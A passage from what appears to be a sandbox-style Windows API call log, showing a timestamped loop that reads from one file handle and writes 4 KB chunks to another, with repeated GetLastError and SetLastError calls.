lpOverlapped=0x0) returned 1 [0091.853] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.853] GetLastError () returned 0x0 [0091.853] SetLastError (dwErrCode=0x0) [0091.853] GetLastError () returned 0x0 [0091.853] SetLastError (dwErrCode=0x0) [0091.853] GetLastError () returned 0x0 [0091.853] SetLastError (dwErrCode=0x0) [0091.853] GetLastError () returned 0x0 [0091.853] SetLastError (dwErrCode=0x0) [0091.853] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.102] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.102] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.103] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.103] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] GetLastError () returned 0x0 [0092.103] SetLastError (dwErrCode=0x0) [0092.103] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.103] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.104] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] GetLastError () returned 0x0 [0092.104] SetLastError (dwErrCode=0x0) [0092.104] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.104] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.105] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] GetLastError () returned 0x0 [0092.105] SetLastError (dwErrCode=0x0) [0092.105] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.105] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.106] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] GetLastError () returned 0x0 [0092.106] SetLastError (dwErrCode=0x0) [0092.106] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.107] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.107] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] GetLastError () returned 0x0 [0092.107] SetLastError (dwErrCode=0x0) [0092.107] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.108] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.108] GetLastError () returned 0x0 [0092.108] SetLastError (dwErrCode=0x0) [0092.108] GetLastError () returned 0x0 [0092.108] SetLastError (dwErrCode=0x0) [0092.108] GetLastError () returned 0x0 [0092.108] SetLastError (dwErrCode=0x0) [0092.108] GetLastError () returned 0x0 [0092.108] SetLastError (dwErrCode=0x0) [0092.108] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.108] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.119] GetLastError () returned 0x0 [0092.119] SetLastError (dwErrCode=0x0) [0092.119] GetLastError () returned 0x0 [0092.119] SetLastError (dwErrCode=0x0) [0092.120] GetLastError () returned 0x0 [0092.120] SetLastError (dwErrCode=0x0) [0092.120] GetLastError () returned 0x0 [0092.120] SetLastError (dwErrCode=0x0) [0092.120] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.120] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.120] GetLastError () returned 0x0 [0092.120] SetLastError (dwErrCode=0x0) [0092.120] GetLastError () returned 0x0 [0092.120] SetLastError (dwErrCode=0x0) [0092.120] GetLastError () returned 0x0 [0092.120] SetLastError (dwErrCode=0x0) [0092.120] GetLastError () returned 0x0 [0092.120] SetLastError (dwErrCode=0x0) [0092.120] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.120] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.121] GetLastError () returned 0x0 [0092.121] SetLastError (dwErrCode=0x0) [0092.121] GetLastError () returned 0x0 [0092.121] SetLastError (dwErrCode=0x0) [0092.121] GetLastError () returned 0x0 [0092.121] SetLastError (dwErrCode=0x0) [0092.121] GetLastError () returned 0x0 [0092.121] SetLastError (dwErrCode=0x0) [0092.121] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.121] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.122] GetLastError () returned 0x0 [0092.122] SetLastError (dwErrCode=0x0) [0092.122] GetLastError () returned 0x0 [0092.122] SetLastError (dwErrCode=0x0) [0092.122] GetLastError () returned 0x0 [0092.122] SetLastError (dwErrCode=0x0) [0092.122] GetLastError () returned 0x0 [0092.122] SetLastError (dwErrCode=0x0) [0092.122] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.122] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.123] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] GetLastError () returned 0x0 [0092.123] SetLastError (dwErrCode=0x0) [0092.123] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.123] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.124] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] GetLastError () returned 0x0 [0092.124] SetLastError (dwErrCode=0x0) [0092.124] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.124] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.125] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] GetLastError () returned 0x0 [0092.125] SetLastError (dwErrCode=0x0) [0092.125] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.125] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.126] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] GetLastError () returned 0x0 [0092.126] SetLastError (dwErrCode=0x0) [0092.126] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.126] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.127] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] GetLastError () returned 0x0 [0092.127] SetLastError (dwErrCode=0x0) [0092.127] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.127] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.128] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] GetLastError () returned 0x0 [0092.128] SetLastError (dwErrCode=0x0) [0092.128] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.129] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.129] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] GetLastError () returned 0x0 [0092.129] SetLastError (dwErrCode=0x0) [0092.129] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.130] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.130] GetLastError () returned 0x0 [0092.130] SetLastError (dwErrCode=0x0) [0092.130] GetLastError () returned 0x0 [0092.130] SetLastError (dwErrCode=0x0) [0092.130] GetLastError () returned 0x0 [0092.130] SetLastError (dwErrCode=0x0) [0092.130] GetLastError () returned 0x0 [0092.130] SetLastError (dwErrCode=0x0) [0092.130] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.130] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.130] GetLastError () returned 0x0 [0092.130] SetLastError (dwErrCode=0x0) [0092.130] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.130] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.131] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 